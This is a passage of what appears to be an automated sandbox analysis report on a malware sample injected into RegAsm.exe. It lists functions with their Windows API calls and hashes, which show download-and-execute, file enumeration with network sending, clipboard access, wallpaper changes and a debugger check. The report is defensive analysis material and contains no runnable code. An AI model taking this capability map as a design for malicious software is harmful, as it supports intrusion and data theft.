                                                  • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                  Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  • Opcode ID: 0d9b42017be71501d33dbc29ad810fbbdc579c8f6a897c623fd1351d11184fdc
                                                  • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                  • Opcode Fuzzy Hash: 0d9b42017be71501d33dbc29ad810fbbdc579c8f6a897c623fd1351d11184fdc
                                                  • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                  Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                  • String ID:
                                                  • API String ID: 1771804793-0
                                                  • Opcode ID: 2aff72510e3da79c4ec0127435383929a3d65dfb18998d25a11cc0f49d42b15d
                                                  • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                  • Opcode Fuzzy Hash: 2aff72510e3da79c4ec0127435383929a3d65dfb18998d25a11cc0f49d42b15d
                                                  • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                  Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadExecuteFileShell
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                  • API String ID: 2825088817-3056885514
                                                  • Opcode ID: ed1d3493dcaa7197a5833749e2ab39951c791bd09ae2e5133bb3481b7f0d9eb9
                                                  • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                  • Opcode Fuzzy Hash: ed1d3493dcaa7197a5833749e2ab39951c791bd09ae2e5133bb3481b7f0d9eb9
                                                  • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                  Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstNextsend
                                                  • String ID: XPG$XPG
                                                  • API String ID: 4113138495-1962359302
                                                  • Opcode ID: c10402a11411eb67977763d9ee290a3a58eac94241b7fce9268609e1d0d0fe6c
                                                  • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                  • Opcode Fuzzy Hash: c10402a11411eb67977763d9ee290a3a58eac94241b7fce9268609e1d0d0fe6c
                                                  • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                  Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                    • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                    • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                  • API String ID: 4127273184-3576401099
                                                  • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                  • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                  • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                  • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                  Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: p'E$JD
                                                  • API String ID: 1084509184-908320845
                                                  • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                  • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                  • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                  • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                  Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                  • String ID:
                                                  • API String ID: 2829624132-0
                                                  • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                  • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                  • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                  Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                  • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                  • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                  • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                  Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                  Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseDataOpen
                                                  • String ID:
                                                  • API String ID: 2058664381-0
                                                  • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                  • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                  Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                  • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                  • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                  • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                  Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: JD
                                                  • API String ID: 1084509184-2669065882
                                                  • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                  • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                  • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                  • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                  Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: GetLocaleInfoEx
                                                  • API String ID: 2299586839-2904428671
                                                  • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                  • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                  • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                  • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                  Function 00451D58 Relevance: 3.2, APIs: 2, Instructions: 236COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                  • String ID:
                                                  • API String ID: 1661935332-0
                                                  • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                  • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                  • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                  • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                  Function 004120B2 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                  • HeapFree.KERNEL32(00000000), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcess
                                                  • String ID:
                                                  • API String ID: 3859560861-0
                                                  • Opcode ID: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                  • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                  • Opcode Fuzzy Hash: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                  • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                  Function 00434CB6 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-0
                                                  • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                  • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                  • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                  • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                  Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                  • String ID:
                                                  • API String ID: 1663032902-0
                                                  • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                  • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                  • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                  • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                  Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                  • String ID:
                                                  • API String ID: 2692324296-0
                                                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                  • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                  • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                  Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                  • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                  • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                  • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                  • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                  Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                  • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                  • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                  • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                  Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
